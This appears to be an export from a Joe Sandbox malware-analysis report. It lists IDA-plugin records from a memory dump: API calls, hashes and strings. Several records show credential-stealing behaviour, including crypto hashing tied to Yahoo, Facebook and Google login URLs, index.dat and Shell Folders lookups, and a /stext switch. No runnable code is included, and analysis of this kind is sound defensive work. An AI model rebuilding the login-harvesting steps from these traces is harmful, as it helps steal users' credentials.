• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
• String ID:
• API String ID: 1161345128-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: _wcsicmp
• String ID: /stext
• API String ID: 2081463915-3817206916
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wcslen$FileFindFirst
                                                                                                                                                    • String ID: index.dat
                                                                                                                                                    • API String ID: 1858513025-427268347
                                                                                                                                                    • Opcode ID: b5a9187b74a8ffb00ae391732f5c189a4998f68d39988537941cb2dcf05d029e
                                                                                                                                                    • Instruction ID: ea6e303a67c95597c7ba2300e155a691c3aaaa96276431a044c3ae834a976286
                                                                                                                                                    • Opcode Fuzzy Hash: b5a9187b74a8ffb00ae391732f5c189a4998f68d39988537941cb2dcf05d029e
                                                                                                                                                    • Instruction Fuzzy Hash: 8601527180526999EB20E662CD426DE727CAF00314F1041BBA858F21D2EB3CDF868F4D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • failed to allocate %u bytes of memory, xrefs: 00412B57
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: malloc
                                                                                                                                                    • String ID: failed to allocate %u bytes of memory
                                                                                                                                                    • API String ID: 2803490479-1168259600
                                                                                                                                                    • Opcode ID: 5b5a248cf51c062ed88202fa4447692d12f7a24d46f4087129949bf54e3fefc0
                                                                                                                                                    • Instruction ID: 83e647f58a001b4b33716092e1dc9084e7a57e1649cb419fd0ecfe0012ae2b1c
                                                                                                                                                    • Opcode Fuzzy Hash: 5b5a248cf51c062ed88202fa4447692d12f7a24d46f4087129949bf54e3fefc0
                                                                                                                                                    • Instruction Fuzzy Hash: B1E026B7F4561267C2004F1AEC019866790AFC032171A063BF92CD7380D678E9A683A9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00414DFF
                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(0CC483FF,00000000,00000000,0045162C,00415453,00000008,00000000,00000000,?,00415610,?,00000000), ref: 00414E08
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ChangeCloseFindNotificationSleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1821831730-0
                                                                                                                                                    • Opcode ID: bdd47c3b9fe514102062cbc93d8af5e804c2569a959601c5796dc848db78b9f9
                                                                                                                                                    • Instruction ID: a5fc701692feba82469beb2995ebf65a4cce15204005db1f3291e32cb0673270
                                                                                                                                                    • Opcode Fuzzy Hash: bdd47c3b9fe514102062cbc93d8af5e804c2569a959601c5796dc848db78b9f9
                                                                                                                                                    • Instruction Fuzzy Hash: 95E0CD372006155FD7005B7CDCC09D77399AF85734725032AF261C3190C665D4424664
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcmpmemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1065087418-0
                                                                                                                                                    • Opcode ID: 025fdd92005a470daeaaf52f40e6be84491494a20acb6a1a3520ba0441d5af98
                                                                                                                                                    • Instruction ID: 09c6ddd7a7fbafff04f5e46546a8ec227a467f18660dcb1fea67ae87f7adc2a4
                                                                                                                                                    • Opcode Fuzzy Hash: 025fdd92005a470daeaaf52f40e6be84491494a20acb6a1a3520ba0441d5af98
                                                                                                                                                    • Instruction Fuzzy Hash: EB6170B1E05205FFDB11EFA489A09EEB7B8AB04308F14806FE108E3241D7789ED5DB59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004038C4: LoadLibraryW.KERNEL32(advapi32.dll,?,00409AAA,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,0041018E,?,?), ref: 004038CF
                                                                                                                                                      • Part of subcall function 004038C4: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004038E3
                                                                                                                                                      • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 004038EF
                                                                                                                                                      • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 004038FB
                                                                                                                                                      • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403907
                                                                                                                                                      • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403913
                                                                                                                                                      • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 0040391F
                                                                                                                                                    • wcslen.MSVCRT ref: 00409901
                                                                                                                                                    • memset.MSVCRT ref: 00409980
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$LibraryLoadmemsetwcslen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1960736289-0
                                                                                                                                                    • Opcode ID: 4e256b32b087a2d54a013736d5ec90ac317bbbafb522d715d277fbd7e177f48e
                                                                                                                                                    • Instruction ID: eeeebaecff14eb5a2c3d0f3031068d4b6d2ebef8e1bb4496a3092dc18c5c1f6a
                                                                                                                                                    • Opcode Fuzzy Hash: 4e256b32b087a2d54a013736d5ec90ac317bbbafb522d715d277fbd7e177f48e
                                                                                                                                                    • Instruction Fuzzy Hash: C0318172510249BBCF11EFA5CCC19EE77B9AF48304F14887EF505B7282D638AE499B64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040EDFA: memset.MSVCRT ref: 0040EE42
                                                                                                                                                      • Part of subcall function 0040EDFA: wcslen.MSVCRT ref: 0040EE59
                                                                                                                                                      • Part of subcall function 0040EDFA: wcslen.MSVCRT ref: 0040EE61
                                                                                                                                                      • Part of subcall function 0040EDFA: wcslen.MSVCRT ref: 0040EEBC
                                                                                                                                                      • Part of subcall function 0040EDFA: wcslen.MSVCRT ref: 0040EECA
                                                                                                                                                      • Part of subcall function 0040797A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,0040EDAE,00000000,?,00000000,?,00000000), ref: 00407992
                                                                                                                                                      • Part of subcall function 0040797A: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 004079A6
                                                                                                                                                      • Part of subcall function 0040797A: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004101ED), ref: 004079AF
                                                                                                                                                    • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 0040EDB8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wcslen$File$Time$CloseCompareCreateHandlememset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4204647287-0
                                                                                                                                                    • Opcode ID: eeb16535b7e8d9903344e6e4fc87394a79dd4b2724dffbbd49d7f28440978fac
                                                                                                                                                    • Instruction ID: 7375e5b5c48a3cf746583bdb812c6cb833081a8f043ffb24ec2f547d3e817a13
                                                                                                                                                    • Opcode Fuzzy Hash: eeb16535b7e8d9903344e6e4fc87394a79dd4b2724dffbbd49d7f28440978fac
                                                                                                                                                    • Instruction Fuzzy Hash: 58114C72C00219ABCF11EBA5D9419DEBBB9EF44300F20047BE801F3280D634AF44CB96
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • SetFilePointerEx.KERNELBASE(0040511F,?,?,00000000,00000000,000000FF,0040571F,000000FF,000000FF,?,00000000,0040511F,?,?,?,0040566C), ref: 00405165
                                                                                                                                                      • Part of subcall function 00407B93: ReadFile.KERNELBASE(?,?,5"D,00000000,00000000,?,?,00442235,00000000,00000000), ref: 00407BAA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$PointerRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3154509469-0
                                                                                                                                                    • Opcode ID: 8e3300ccc99ceaafd88bf63aedabe6f8cf4ec2b06029cc1f8c5137446a6ac1ce
                                                                                                                                                    • Instruction ID: 13fe659266928e09ca291fdb8c13dcfe3ff2a23a31d494a2ddaccb8188200d23
                                                                                                                                                    • Opcode Fuzzy Hash: 8e3300ccc99ceaafd88bf63aedabe6f8cf4ec2b06029cc1f8c5137446a6ac1ce
                                                                                                                                                    • Instruction Fuzzy Hash: 5CE0C736100100FFE6208F08CC06F6BBBF9EBC4B00F10883EB2A49A0B1C2326812CB24
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetPrivateProfileIntW.KERNEL32 ref: 00411B5D
                                                                                                                                                      • Part of subcall function 004119C6: memset.MSVCRT ref: 004119E5
                                                                                                                                                      • Part of subcall function 004119C6: _itow.MSVCRT ref: 004119FC
                                                                                                                                                      • Part of subcall function 004119C6: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00411A0B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4232544981-0
                                                                                                                                                    • Opcode ID: 4eb565fe38f19d9fcd3ef397b8be022b0e8b2ee90877df68a8cf7ef72faf0ee1
                                                                                                                                                    • Instruction ID: e4974885a9e011c02de9f8347c72c3dce1736aa6ad634daf2893e710d343c839
                                                                                                                                                    • Opcode Fuzzy Hash: 4eb565fe38f19d9fcd3ef397b8be022b0e8b2ee90877df68a8cf7ef72faf0ee1
                                                                                                                                                    • Instruction Fuzzy Hash: ABE0B672000149AFDF125F80EC01AA97BA6FF04315F248459FA5805631D73695B0EB95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0041139E: LoadLibraryW.KERNELBASE(psapi.dll,00000000,0041137E,00000000,0041126B,00000000,?), ref: 004113A9
                                                                                                                                                      • Part of subcall function 0041139E: GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004113BD
                                                                                                                                                      • Part of subcall function 0041139E: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 004113C9
                                                                                                                                                      • Part of subcall function 0041139E: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 004113D5
                                                                                                                                                      • Part of subcall function 0041139E: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 004113E1
                                                                                                                                                      • Part of subcall function 0041139E: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 004113ED
                                                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,0041126B,00000104,0041126B,00000000,?), ref: 00411395
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$FileLibraryLoadModuleName
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3821362017-0
                                                                                                                                                    • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                    • Instruction ID: 161ab63227dca0468342f2fd6fc01eeb5e2c53d4d8b5c6eb41d2cf02796b8335
                                                                                                                                                    • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                    • Instruction Fuzzy Hash: B3D0A9312183196BE220AB708C00FABA3E86B40710F008C2ABAA0D68A8D264C8805354
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040C605,00000000,00448B84,00000002,?,?,?,0040E2DC,00000000), ref: 00407BC9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                    • Opcode ID: d369bb92ad7c49a717be8c21899150b55a2c28b5f26bff8a5462d106715fcbd8
                                                                                                                                                    • Instruction ID: 7a92458e03063ade3ff171a8f73d1b131da45bdd434acd56d38c8090c64c1cda
                                                                                                                                                    • Opcode Fuzzy Hash: d369bb92ad7c49a717be8c21899150b55a2c28b5f26bff8a5462d106715fcbd8
                                                                                                                                                    • Instruction Fuzzy Hash: 47D0C93511020DFBDF01CF80DC06FDD7B7DEB04759F108054BA1495060D7B59B14AB54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                    • Opcode ID: 9a929023f2c627b70a1d779166e782d06c126c11e9800125383b8a94db93c5c6
                                                                                                                                                    • Instruction ID: 81d2dec17d2b84b4128be66cdd24e97b0dbf61b8fa3bcd6fd5fd384be9d73f32
                                                                                                                                                    • Opcode Fuzzy Hash: 9a929023f2c627b70a1d779166e782d06c126c11e9800125383b8a94db93c5c6
                                                                                                                                                    • Instruction Fuzzy Hash: E4C092B0240201BEFF228B10ED16F36695CD740B01F2044247E00E40E0D1A04F108924
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040C5D7,?,?,00000000,00000001,?,?,?,0040E2DC), ref: 0040716F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                    • Opcode ID: b3d4b136a85312aa723e3c9e2acb5816e1c60966b2ab5dba606afdc82e084c94
                                                                                                                                                    • Instruction ID: 6739adb68e03e12f7f7c1d8ccdc83ffe2e18cb8bef7d19e3acfe4a72d1b5eace
                                                                                                                                                    • Opcode Fuzzy Hash: b3d4b136a85312aa723e3c9e2acb5816e1c60966b2ab5dba606afdc82e084c94
                                                                                                                                                    • Instruction Fuzzy Hash: 49C092F02502017EFF208B10AD0AF37695DD780B01F2084207E00E40E0D2A14C008924
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??3@
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                    • Opcode ID: 6d234507db9eff2efabc180c4569eab15715e06228adb937f803b04aca3214d4
                                                                                                                                                    • Instruction ID: b86fd1081c12c971c14e25096d529e9df9055785cb1c99d48f6af2a57df14557
                                                                                                                                                    • Opcode Fuzzy Hash: 6d234507db9eff2efabc180c4569eab15715e06228adb937f803b04aca3214d4
                                                                                                                                                    • Instruction Fuzzy Hash: D3C09BB15127015BFB345E15D50571273E45F50727F354C1DB4D1D24C2DB7CD4408518
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • FindClose.KERNELBASE(?,004083EE,?,00000000,00000000,?,00410708,?), ref: 004084E4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseFind
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1863332320-0
                                                                                                                                                    • Opcode ID: ce138f875d3acdc4bfbe17b30e16d53cb8f2c6707e5d1d9850a648f01b786906
                                                                                                                                                    • Instruction ID: a26663696ee19f03613d77843e46d9f39b2dea1a9069363f3edb82d48ea13a69
                                                                                                                                                    • Opcode Fuzzy Hash: ce138f875d3acdc4bfbe17b30e16d53cb8f2c6707e5d1d9850a648f01b786906
                                                                                                                                                    • Instruction Fuzzy Hash: FFC092346205028BE23C5F38AD5A82A77E0BF4A3313B40F6CA0F3D20F0EB3884428A04
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • FreeLibrary.KERNELBASE(?,00409EC4,00000000,004101A5,?,?,?,?,?,0040328B,?), ref: 004117EF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                    • Opcode ID: 0e5244a652f8a00c19ee35b2b6df8d293c0f8fc24debe18f1969453427d3ee92
                                                                                                                                                    • Instruction ID: 28a9858cfff7e6e2b1914a1c804994c03dcb5394f8963e6e43683e707f81cfe3
                                                                                                                                                    • Opcode Fuzzy Hash: 0e5244a652f8a00c19ee35b2b6df8d293c0f8fc24debe18f1969453427d3ee92
                                                                                                                                                    • Instruction Fuzzy Hash: 83C04C351107028BE7218B12C849753B7F8BB00717F40C818A566859A0D77CE454CE18
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • EnumResourceNamesW.KERNELBASE(?,?,00411EF8,00000000), ref: 00411F8D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnumNamesResource
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3334572018-0
                                                                                                                                                    • Opcode ID: ad90743229005492c5e374903a2f61f35334675862818203282ec323c157130c
                                                                                                                                                    • Instruction ID: 6c621939844f31da33ced499d0f7f7abb962291178acb537878d9391fa7c1b50
                                                                                                                                                    • Opcode Fuzzy Hash: ad90743229005492c5e374903a2f61f35334675862818203282ec323c157130c
                                                                                                                                                    • Instruction Fuzzy Hash: C8C09B32194342BBD7019F508C05F1B7A95BB55703F104C297561940B0C75140549605
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,0040A987,?,0040AA3E,00000000,?,00000000,00000208,?), ref: 0040754C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: 201396fe258989d033aef496f9219e0ec37e2295b66c2c7cdc95f8b8143fc0af
                                                                                                                                                    • Instruction ID: 786af1a6681fc588f4ed673612d44b37cd66a9ddadc6b0c90f2aca86fde3c3ed
                                                                                                                                                    • Opcode Fuzzy Hash: 201396fe258989d033aef496f9219e0ec37e2295b66c2c7cdc95f8b8143fc0af
                                                                                                                                                    • Instruction Fuzzy Hash: 41B012792100404BCB080B349C4504D75506F46B32B20473CB073C00F0DB30CD70BA00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00412303,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00411B7A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Open
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                    • Opcode ID: d8bfda6a3cd3cbaaac1923a92569980932abdf526a58af7fc260ebb20eba954b
                                                                                                                                                    • Instruction ID: 8fd1618fdc001f910610ea30bed12e65be45571f6aff6d2ea6de46bc6098db87
                                                                                                                                                    • Opcode Fuzzy Hash: d8bfda6a3cd3cbaaac1923a92569980932abdf526a58af7fc260ebb20eba954b
                                                                                                                                                    • Instruction Fuzzy Hash: F8C09B35544301BFDE114F40FD05F09BF71BB84F05F004414B244640B1C2714414EB17
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407EB8: free.MSVCRT(?,00408225,00000000,?,00000000), ref: 00407EBB
                                                                                                                                                      • Part of subcall function 00407EB8: free.MSVCRT(?,?,00408225,00000000,?,00000000), ref: 00407EC3
                                                                                                                                                    • free.MSVCRT(?,00000000,?,00000000), ref: 004082B2
                                                                                                                                                      • Part of subcall function 00408001: free.MSVCRT(?,00000000,?,004082EE,00000000,?,00000000), ref: 00408010
                                                                                                                                                      • Part of subcall function 00407475: malloc.MSVCRT ref: 00407491
                                                                                                                                                      • Part of subcall function 00407475: memcpy.MSVCRT ref: 004074A9
                                                                                                                                                      • Part of subcall function 00407475: free.MSVCRT(00000000,00000000,?,00408025,00000002,?,00000000,?,004082EE,00000000,?,00000000), ref: 004074B2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: free$mallocmemcpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3401966785-0
                                                                                                                                                    • Opcode ID: 2965bb17a7e0c771abc11c43702067ecb1f0b8c1624655e4732796e1fec34586
                                                                                                                                                    • Instruction ID: 9a294873d4d6790ac16ff047b4da0d243ffe3cbd3c442eed78fe53e82fef6e86
                                                                                                                                                    • Opcode Fuzzy Hash: 2965bb17a7e0c771abc11c43702067ecb1f0b8c1624655e4732796e1fec34586
                                                                                                                                                    • Instruction Fuzzy Hash: 22513672D006099BCB10DF99C5804DEBBB5BB48314F60817FE990B7391DB38AE85CB99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8f1ea4edb21489f0e9da39dbf0cd51e2c4ea33e260fdfc36b72a489d37fc77cd
                                                                                                                                                    • Instruction ID: 4be01e504a1dbe863e5cd1883b5f47abe9c308d3627063d178914d84215e5ed1
                                                                                                                                                    • Opcode Fuzzy Hash: 8f1ea4edb21489f0e9da39dbf0cd51e2c4ea33e260fdfc36b72a489d37fc77cd
                                                                                                                                                    • Instruction Fuzzy Hash: 32319E31614206EFDF14AF15D9517DAB3A0FF00364F11412BF8259B290EB38EDE09BA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
